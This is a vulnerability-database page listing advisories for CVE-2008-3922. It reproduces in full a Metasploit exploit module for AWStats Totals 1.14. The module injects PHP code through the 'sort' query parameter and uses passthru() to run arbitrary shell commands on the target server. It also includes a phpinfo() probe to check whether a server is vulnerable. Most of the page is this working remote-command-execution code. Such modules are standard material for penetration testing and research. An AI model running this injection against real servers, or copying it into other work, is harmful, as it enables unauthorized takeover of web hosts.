AWStats Totals 1.14 Remote Command Execution

🗓️ 26 May 2011 00:00:00Reported by Patrick WebsterType

packetstorm🔗 packetstormsecurity.com👁 27 Views

AWStats Totals v1.14 Remote Command Executio

Reporter	Title	Published	Views	Family All 14
0day.today	AWStats Totals =< v1.14 multisort Remote Command Execution	25 May 201100:00	–	zdt
Tenable Nessus	AWStats Totals awstatstotals.php multisort() Function sort Parameter Arbitrary PHP Code Execution	27 Aug 200800:00	–	nessus
Circl	CVE-2008-3922	5 Sep 200800:00	–	circl
Check Point Advisories	AWStats Totals awstatstotals.php sort Parameter Code Execution (CVE-2008-3922)	3 Apr 201600:00	–	checkpoint_advisories
CVE	CVE-2008-3922	4 Sep 200818:00	–	cve
Cvelist	CVE-2008-3922	4 Sep 200818:00	–	cvelist
Dsquare	Awstats Totals <= 1.14 RCE	26 Jan 201200:00	–	dsquare
Exploit DB	AWStats Totals 1.14 multisort - Remote Command Execution (Metasploit)	25 May 201100:00	–	exploitdb
Metasploit	AWStats Totals multisort Remote Command Execution	25 May 201110:42	–	metasploit
Nmap	http-awstatstotals-exec NSE Script	23 Aug 201106:29	–	nmap

`##  
# $Id: awstatstotals_multisort.rb 12715 2011-05-25 10:45:36Z patrickw $  
##  
  
##  
# This file is part of the Metasploit Framework and may be subject to  
# redistribution and commercial restrictions. Please see the Metasploit  
# Framework web site for more information on licensing and terms of use.  
# http://metasploit.com/framework/  
##  
  
  
require 'msf/core'  
  
  
class Metasploit3 < Msf::Exploit::Remote  
Rank = ExcellentRanking  
  
include Msf::Exploit::Remote::HttpClient  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'AWStats Totals =< v1.14 multisort Remote Command Execution',  
'Description' => %q{  
This module exploits an arbitrary command execution vulnerability in the  
AWStats Totals PHP script. AWStats Totals version v1.0 - v1.14 are vulnerable.  
},  
'Author' => [ 'patrick' ],  
'License' => MSF_LICENSE,  
'Version' => '$Revision: 12715 $',  
'References' =>  
[  
['CVE', '2008-3922'],  
['OSVDB', '47807'],  
['BID', '30856'],  
['URL', 'http://userwww.service.emory.edu/~ekenda2/EMORY-2008-01.txt'],  
],  
'Privileged' => false,  
'Payload' =>  
{  
'DisableNops' => true,  
'Space' => 512,  
'Compat' =>  
{  
'PayloadType' => 'cmd',  
'RequiredCmd' => 'generic perl ruby bash telnet',  
}  
},  
'Platform' => 'unix',  
'Arch' => ARCH_CMD,  
'Targets' => [[ 'Automatic', { }]],  
'DisclosureDate' => 'Aug 26 2008',  
'DefaultTarget' => 0))  
  
register_options(  
[  
OptString.new('URI', [true, "The full URI path to awstatstotals.php", "/awstatstotals/awstatstotals.php"]),  
], self.class)  
end  
  
def check  
res = send_request_cgi({  
'uri' => datastore['URI'],  
'vars_get' =>  
{  
'sort' => '"].phpinfo().exit().$a["'  
}  
}, 25)  
  
if (res and res.body.match(/localhost/))  
return Exploit::CheckCode::Vulnerable  
end  
  
return Exploit::CheckCode::Safe  
end  
  
def exploit  
command = Rex::Text.uri_encode(payload.encoded)  
sploit = datastore['URI'] + '?sort="].passthru(\'echo%20YYY;' + command + ';echo%20YYY;\').exit().%24a["'  
  
res = send_request_raw({  
'uri' => sploit,  
'method' => 'GET',  
'headers' =>  
{  
'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',  
'Connection' => 'Close',  
}  
}, 25)  
  
if (res)  
print_status("The server returned: #{res.code} #{res.message}")  
  
m = res.body.match(/YYY\n(.*)\nYYY/m)  
  
if (m)  
print_status("Command output from the server:")  
print("\n" + m[1] + "\n\n")  
else  
print_status("This server may not be vulnerable")  
end  
else  
print_status("No response from the server")  
end  
end  
  
end  
  
`

26 May 2011 00:00Current

0.2Low risk

Vulners AI Score0.2

EPSS0.91414